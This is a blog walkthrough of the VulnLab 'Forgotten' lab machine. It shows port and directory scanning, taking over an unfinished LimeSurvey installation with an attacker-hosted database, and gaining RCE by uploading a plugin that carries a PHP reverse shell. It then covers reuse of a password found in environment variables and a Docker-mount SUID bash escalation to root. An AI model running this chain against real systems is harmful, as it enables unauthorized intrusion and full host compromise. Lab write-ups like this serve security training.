Post

VulnLab Forgotten

VulnLab Forgotten

VulnLab Forgotten

Forgotten

Recon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
└─$ rustscan -a 10.10.93.59 -r 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 10.10.93.59:22
Open 10.10.93.59:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-08 20:37 +05
Initiating Ping Scan at 20:37
Scanning 10.10.93.59 [4 ports]
Completed Ping Scan at 20:37, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:37
Completed Parallel DNS resolution of 1 host. at 20:37, 0.10s elapsed
DNS resolution of 1 IPs took 0.10s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:37
Scanning 10.10.93.59 [2 ports]
Discovered open port 80/tcp on 10.10.93.59
Discovered open port 22/tcp on 10.10.93.59
Completed SYN Stealth Scan at 20:37, 1.70s elapsed (2 total ports)
Nmap scan report for 10.10.93.59
Host is up, received echo-reply ttl 63 (0.21s latency).
Scanned at 2024-12-08 20:37:13 +05 for 2s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 62

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.05 seconds
           Raw packets sent: 7 (284B) | Rcvd: 3 (116B)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
└─$ nmap -sC -sV -p22,80 10.10.93.59   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-08 20:37 +05
Nmap scan report for 10.10.93.59
Host is up (0.100s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3d:21:10:98:e7:f4:8d:e7:be:c7:d1:8b:ca:d8:5d:10 (ECDSA)
|_  256 c9:b1:81:cf:be:6d:2f:c5:ea:72:8d:fb:e1:93:60:60 (ED25519)
80/tcp open  http    Apache httpd 2.4.56
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: Host: 172.17.0.2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.06 seconds

Visiting web server return 403

Let’s fuzz it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ gobuster dir -u http://10.10.93.59 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt   
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.93.59
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/survey               (Status: 301) [Size: 311] [--> http://10.10.93.59/survey/]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
└─$ ffuf -u http://10.10.93.59/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt  

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.93.59/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.html                   [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 110ms]
.htm                    [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 111ms]
survey                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 100ms]
.                       [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 98ms]
.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 97ms]
<SNIP>

We find LimeSurvey softare running on /survey endpoint

User

The version of the software is LimeSurvey 6.3.7. Googling about vulnerabilities only shows RCE vulnerability. But we can’t test it since we have to finish the installation. In order to do that seems like we have to deploy mysql database on our attack box. Change bind-address in /etc/mysql/mariadb.conf.d/50-server.cnf to 0.0.0.0. Then deploy it

1
2
3
4
5
└─$ sudo systemctl status mariadb
● mariadb.service - MariaDB 11.4.3 database server
     Loaded: loaded (/usr/lib/systemd/system/mariadb.service; disabled; preset: disabled)
     Active: active (running) since Sun 2024-12-08 21:08:58 +05; 2s ago

Login and grant access to Forgotten box

1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ sudo mysql -uroot            
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 48
Server version: 11.4.3-MariaDB-1 Debian n/a

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> GRANT ALL PRIVILEGES ON *.* TO 'root'@'10.10.93.59' IDENTIFIED BY 'root' WITH GRANT OPTION;
Query OK, 0 rows affected (0.001 sec)

MariaDB [(none)]> 

Now, continue installation. It will create a database for us

Populate the database and finish the installation

Now we login to admin panel and follow the instructions from this blog. We need to download this PoC. Modify php-rev.php and config.xml files. Set version to 6.3.7 in config.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?xml version="1.0" encoding="UTF-8"?>
<config>
    <metadata>
        <name>Y1LD1R1M</name>
        <type>plugin</type>
        <creationDate>2020-03-20</creationDate>
        <lastUpdate>2020-03-31</lastUpdate>
        <author>Y1LD1R1M</author>
        <authorUrl>https://github.com/Y1LD1R1M-1337</authorUrl>
        <supportUrl>https://github.com/Y1LD1R1M-1337</supportUrl>
        <version>5.0</version>
        <license>GNU General Public License version 2 or later</license>
        <description>
                <![CDATA[Author : Y1LD1R1M]]></description>
    </metadata>

    <compatibility>
        <version>6.3.7</version>
    </compatibility>
    <updaters disabled="disabled"></updaters>
</config>

Zip the files

1
2
3
└─$ zip rce-plugin.zip ./php-rev.php ./config.xml
  adding: php-rev.php (deflated 61%)
  adding: config.xml (deflated 53%)

Go Configuration -> Plugins -> Upload & Install. Upload zip archive, install it and then activate the plugin.

We have to visit http://10.10.93.59/survey/upload/plugins/Y1LD1R1M/php-rev.php and then should receive receive our shell

There is no user flag. We see that it’s a docker container. We can check environmental variables

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ env
APACHE_CONFDIR=/etc/apache2
HOSTNAME=efaa6f5097ed
PHP_INI_DIR=/usr/local/etc/php
LIMESURVEY_ADMIN=limesvc
SHLVL=0
PHP_LDFLAGS=-Wl,-O1 -pie
APACHE_RUN_DIR=/var/run/apache2
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
PHP_VERSION=8.0.30
APACHE_PID_FILE=/var/run/apache2/apache2.pid
GPG_KEYS=1729F83938DA44E27BA0F4D3DBDB397470D12172 BFDDD28642824F8118EF77909B67A5C12229118F 2C16C765DBE54A088130F1BC4B9B5F600B55F3B4 39B641343D8C104B2B146DC3F9C39DC0B9698544
PHP_ASC_URL=https://www.php.net/distributions/php-8.0.30.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
PHP_URL=https://www.php.net/distributions/php-8.0.30.tar.xz
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_GROUP=limesvc
APACHE_RUN_USER=limesvc
APACHE_LOG_DIR=/var/log/apache2
LIMESURVEY_PASS=<REDACTED>
PWD=/
PHPIZE_DEPS=autoconf            dpkg-dev                file            g++             gcc             libc-dev                make            pkg-config              re2c
PHP_SHA256=216ab305737a5d392107112d618a755dc5df42058226f1670e9db90e77d777d9
APACHE_ENVVARS=/etc/apache2/envvars

Nothing interesting except for LIMESURVEY_PASS. Upgrade shell with script /dev/null -c bash to be able to run sudo -l.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
limesvc@efaa6f5097ed:/$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for limesvc: <REDACTED>

Matching Defaults entries for limesvc on efaa6f5097ed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User limesvc may run the following commands on efaa6f5097ed:
    (ALL : ALL) ALL

Nothing useful, but trying to login as limesvc via ssh works

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
└─$ ssh limesvc@10.10.93.59  
The authenticity of host '10.10.93.59 (10.10.93.59)' can't be established.
ED25519 key fingerprint is SHA256:w4tkIX1hTe4ALi8CJCkIgOtasP2UzGJl1KT8+iXvogY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.93.59' (ED25519) to the list of known hosts.
(limesvc@10.10.93.59) Password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-1012-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Dec  8 16:35:23 UTC 2024

  System load:  0.0               Processes:                119
  Usage of /:   39.1% of 7.57GB   Users logged in:          0
  Memory usage: 20%               IPv4 address for docker0: 172.17.0.1
  Swap usage:   0%                IPv4 address for ens5:    10.10.93.59


Expanded Security Maintenance for Applications is not enabled.

76 updates can be applied immediately.
48 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Dec  2 15:32:15 2023 from 10.10.1.254
limesvc@ip-10-10-200-233:~$ 

Root

Let’s enumerate as limesvc. We find /opt/limesurvey, which might be mounted to container

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
limesvc@ip-10-10-200-233:/opt/limesurvey$ ls -lha
total 168K
drwxr-xr-x  15 limesvc limesvc 4.0K Nov 27  2023 .
drwxr-xr-x   4 root    root    4.0K Dec  2  2023 ..
-rw-rw-r--   1 limesvc limesvc 1.1K Nov 27  2023 .htaccess
-rw-rw-r--   1 limesvc limesvc  49K Nov 27  2023 LICENSE
-rw-rw-r--   1 limesvc limesvc 2.5K Nov 27  2023 README.md
-rw-rw-r--   1 limesvc limesvc  536 Nov 27  2023 SECURITY.md
drwxr-xr-x   2 limesvc limesvc 4.0K Nov 27  2023 admin
drwxr-xr-x  15 limesvc limesvc 4.0K Nov 27  2023 application
drwxr-xr-x  10 limesvc limesvc 4.0K Nov 27  2023 assets
drwxr-xr-x   7 limesvc limesvc 4.0K Nov 27  2023 docs
-rw-rw-r--   1 limesvc limesvc 8.0K Nov 27  2023 gulpfile.js
-rw-rw-r--   1 limesvc limesvc 5.5K Nov 27  2023 index.php
drwxr-xr-x   4 limesvc limesvc 4.0K Nov 27  2023 installer
drwxr-xr-x 120 limesvc limesvc 4.0K Nov 27  2023 locale
drwxr-xr-x   4 limesvc limesvc 4.0K Nov 27  2023 modules
drwxr-xr-x  23 limesvc limesvc 4.0K Nov 27  2023 node_modules
-rwxrwxr-x   1 limesvc limesvc 9.5K Nov 27  2023 open-api-gen.php
drwxr-xr-x   3 limesvc limesvc 4.0K Nov 27  2023 plugins
-rw-rw-r--   1 limesvc limesvc 2.2K Nov 27  2023 psalm-all.xml
-rw-rw-r--   1 limesvc limesvc 1.1K Nov 27  2023 psalm-strict.xml
-rw-rw-r--   1 limesvc limesvc 1.1K Nov 27  2023 psalm.xml
-rw-rw-r--   1 limesvc limesvc 1.7K Nov 27  2023 setdebug.php
drwxr-xr-x   5 limesvc limesvc 4.0K Nov 27  2023 themes
drwxr-xr-x   6 limesvc limesvc 4.0K Dec  8 16:27 tmp
drwxr-xr-x   9 limesvc limesvc 4.0K Nov 27  2023 upload
drwxr-xr-x  36 limesvc limesvc 4.0K Nov 27  2023 vendor

We can confirm it by running findmnt from container

1
2
3
4
5
6
7
8
9
10
limesvc@efaa6f5097ed:/$ findmnt
<SNIP>
|-/etc/resolv.conf      /dev/root[/var/lib/docker/containers/efaa6f5097edd5289e5af809a8885d4eae195426317ee5cdba47c1ff7c1ca68d/resolv.conf]
|                                                  ext4    rw,relatime,discard,e
|-/etc/hostname         /dev/root[/var/lib/docker/containers/efaa6f5097edd5289e5af809a8885d4eae195426317ee5cdba47c1ff7c1ca68d/hostname]
|                                                  ext4    rw,relatime,discard,e
|-/etc/hosts            /dev/root[/var/lib/docker/containers/efaa6f5097edd5289e5af809a8885d4eae195426317ee5cdba47c1ff7c1ca68d/hosts]
|                                                  ext4    rw,relatime,discard,e
`-/var/www/html/survey  /dev/root[/opt/limesurvey] ext4    rw,relatime,discard,e

We can see that docker process is running as root

1
2
3
4
5
6
7
8
limesvc@ip-10-10-200-233:/opt/limesurvey$ ps -aef
UID          PID    PPID  C STIME TTY          TIME CMD
<SNIP>
root         677       1  0 15:35 ?        00:00:02 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root         951     677  0 15:35 ?        00:00:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 80 -container-ip 172.17.0.2 -container-port 80
root         957     677  0 15:35 ?        00:00:00 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 80 -container-ip 172.17.0.2 -container-port 80
root         980       1  0 15:35 ?        00:00:01 /usr/bin/containerd-shim-runc-v2 -namespace moby -id efaa6f5097edd5289e5af809a8885d4eae195426317ee5cdba47c1ff7c1ca68d -address /run/containerd/containerd.sock
<SNIP>

We can try to create a bash suid file in the mounted folder inside the container and execute it from the host to privesc. Now we run the following commands inside the container as root in mounted directory

1
2
3
4
5
6
root@efaa6f5097ed:/var/www/html/survey# cp /bin/bash ./privesc
cp /bin/bash ./privesc
root@efaa6f5097ed:/var/www/html/survey# chown root:root ./privesc
chown root:root ./privesc
root@efaa6f5097ed:/var/www/html/survey# chmod 4777 ./privesc
chmod 4777 ./privesc

Then invoke binary from the host

1
2
3
4
limesvc@ip-10-10-200-233:/opt/limesurvey$ ./privesc -p
privesc-5.1# whoami
root
privesc-5.1# 

https://api.vulnlab.com/api/v1/share?id=ef9f5fc4-cc12-4c09-9dae-35c9e7c819ef

This post is licensed under CC BY 4.0 by the author.